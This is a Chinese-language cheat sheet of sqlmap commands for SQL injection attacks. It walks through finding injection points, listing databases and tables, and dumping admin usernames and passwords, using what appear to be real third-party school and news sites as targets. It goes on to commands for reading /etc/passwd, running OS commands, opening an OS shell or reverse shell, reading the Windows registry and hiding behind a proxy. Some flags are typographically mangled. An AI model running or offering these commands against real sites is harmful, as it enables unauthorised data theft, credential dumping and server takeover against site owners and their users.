sqlmap常用指令和引數
/*
-u型別為指令 --tables為引數
當使用的程式碼為巢狀型(例如先猜表名 後猜指定欄位時) 需要鍵入上一次用到的指令(如果上一次為引數要轉換)
引數轉換為指令 : --tables >> -T
例如 要猜欄位時 需要鍵入指定表段 */
檢查注入點
sqlmap.py -u "http://www.scshlx.com/TeachView.asp?id=21"
列資料庫資訊
sqlmap -u "http://www.scshlx.com/TeachView.asp?id=21" --dbs
指定庫名列出所有表 //最大搜索執行緒為10
sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables
指定庫名錶名列出所有欄位
sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" -T "雙引號下為指定表名admin" --columns
指定庫名錶名欄位名dump出指定欄位的內容
sqlmap -u "http://ooxx.com.tw/star_photo.php?artist_id=11" --dump -T "admin" -C "username,password"
查詢表名下所有欄位
sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables --columns
Mysql注入(有多個庫 必須找到有管理員的資料庫)
--is-dba 當前使用者許可權
--dbs 所有資料庫
--current-db 網站當前資料庫
--users 所有資料庫使用者
--current-user 當前資料庫使用者
--tables-D"當前資料庫名字" 查表名、
-T"指定的表名"-D"當前資料庫名字"--columns 查欄位
Cookie注入(遇到防注入)
sqlmap.py -u "http://www.scshlx.com/TeachView.asp" --cookie"id=21"--level 2
列表名等 在上方程式碼後面加--tables等;
eg:sqlmap.py -u "http://www.hexuan.com/shownews.asp" --cookie "id=1749" --level 2 --dump -T "admin" -C "username"
有幾個引數可能會用到,直接加在最後面就可以了,更多詳細引數見官方文件:
–cookie=COOKIE 在需要登入的地方,需要登入後的cookie
–proxy=”http://127.0.0.1:8087″ 使用HTTP代理隱藏自己的身份,比如使用goagent等
–sql-query=QUERY 執行一個sql語句,不一定支援
sqlmap -u “http://url/news?id=1″ --dbms “Mysql” –users # dbms 指定數 據庫型別
sqlmap -u “http://url/news?id=1″ -- users 列資料庫使用者
sqlmap -u “http://url/news?id=1″ -- dbs 列資料庫
sqlmap -u “http://url/news?id=1″ -- passwords 資料庫使用者密碼
sqlmap -u “http://url/news?id=1″ -- passwords-U root -v 0 #列出指定使用者 資料庫密碼
sqlmap -u “http://url/news?id=1″ -- dump -C “password,user,id” -T “tablename”-D “db_name”
–start 1 –stop 20 #列出指定欄位,列出20 條
sqlmap -u “http://url/news?id=1″ -- dump-all -v 0 #列出所有資料庫所有表
sqlmap -u “http://url/news?id=1″ -- privileges #檢視許可權
sqlmap -u “http://url/news?id=1″ -- privileges -U root #檢視指定使用者許可權sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是資料庫管理員sqlmap -u “http://url/news?id=1″ –roles #列舉資料庫使用者角色
sqlmap -u “http://url/news?id=1″ -- udf-inject #匯入使用者自定義函式(獲取 系統許可權!)
sqlmap -u “http://url/news?id=1″ -- dump-all –exclude-sysdbs -v 0 #列 出當前庫所有表
sqlmap -u “http://url/news?id=1″ -- union-cols #union 查詢表記錄
sqlmap -u “http://url/news?id=1″ -- cookie “COOKIE_VALUE”#cookie注入
sqlmap -u “http://url/news?id=1″ -- b #獲取banner資訊
sqlmap -u “http://url/news?id=1″ -- data “id=3″#post注入
sqlmap -u “http://url/news?id=1″ - v 1 -f #指紋判別資料庫型別
sqlmap -u “http://url/news?id=1″ -- proxy“http://127.0.0.1:8118” #代理注 入
sqlmap -u “http://url/news?id=1″ -- string”STRING_ON_TRUE_PAGE”# 指 定關鍵詞
sqlmap -u “http://url/news?id=1″ -- sql-shell #執行指定sql命令
sqlmap -u “http://url/news?id=1″ -- file /etc/passwd
sqlmap -u “http://url/news?id=1″ -- os-cmd=whoami #執行系統命令
sqlmap -u “http://url/news?id=1″ -- os-shell #系統互動shell sqlmap -u “http://url/news?id=1″ –os-pwn #反彈shell
sqlmap -u “http://url/news?id=1″ -- reg-read #讀取win系統登錄檔
sqlmap -u “http://url/news?id=1″ -- dbs-o “sqlmap.log”#儲存進度
sqlmap -u “http://url/news?id=1″ -- dbs -o “sqlmap.log” –resume #恢復 已儲存進度